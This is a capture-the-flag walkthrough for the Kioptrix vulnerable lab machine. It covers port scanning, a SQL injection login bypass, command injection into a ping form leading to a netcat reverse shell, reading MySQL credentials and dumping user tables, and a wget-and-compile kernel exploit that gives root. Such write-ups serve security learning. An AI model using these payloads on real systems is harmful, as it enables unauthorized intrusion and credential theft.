published on in writeup
tags: kioptrix

Kioptrix Level 1.1

This is a walkthrough of how I completed Kioptrix Level 1.2. The goal of the challenge is to obtain the flag.

Nmap

[email protected]:~/kioptrix/2# nmap -n -sV -A -p- 192.168.1.121

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            822/udp  status
|_  100024  1            825/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-07T23:10:47+00:00
|_Not valid after:  2010-10-07T23:10:47+00:00
|_ssl-date: 2014-04-24T00:38:09+00:00; +3h59m58s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 Forbidden
825/tcp  open  status   1 (RPC #100024)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            822/udp  status
|_  100024  1            825/tcp  status
3306/tcp open  mysql    MySQL (unauthorized)

SQL Injection Login Bypass

I went and had a look at the Apache service running on port 80, and was greated with a login page.

After a few attempts, I was able to bypass this login page by using SQL Injection.

Username: admin
Password: ' or '1'='1

This took me to another page, with a ping webapp.

Command Injection

Entering 127.0.0.1 in this box give me the expected output.

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.064 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.051 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms

By inserting a semi-colon ; into the input window, I was able to insert additional commands. I used this to check for netcat, then to obtain a remote shell.

;/usr/local/bin/nc 192.168.1.120 4444 -e '/bin/bash'
pwd
/var/www/html
ls -la
total 24
drwxr-xr-x  2 root root 4096 Oct  8  2009 .
drwxr-xr-x  8 root root 4096 Oct  7  2009 ..
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 index.php
-rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php

Exploring MySQL

I used the shell to read index.php, which was the original paged used to login, and obtain the username and password it uses to connect to the database. I spent some time exploring the databases within.

head index.php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
mysql --user=john --password=hiroshima -e "show databases;"
mysql --user=john --password=hiroshima -e "use mysql; show tables;"
mysql --user=john --password=hiroshima -e "use mysql; select * from user;"
mysql --user=john --password=hiroshima -e "use mysql; select user, password from user;"
mysql --user=john --password=hiroshima -e "use webapp; show tables;"
mysql --user=john --password=hiroshima -e "use webapp; select * from users;"

Privilege Escalation

In the end, I found a local kernel exploit that worked nicely in elevating my shell to root. I transfered the exploit by hosting it on my own apache server and using wget. It was then compiled with gcc and run.

wget http://192.168.1.120/x.c -O x.c
gcc x.c -o x
./x
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# cat /root/.mysql_history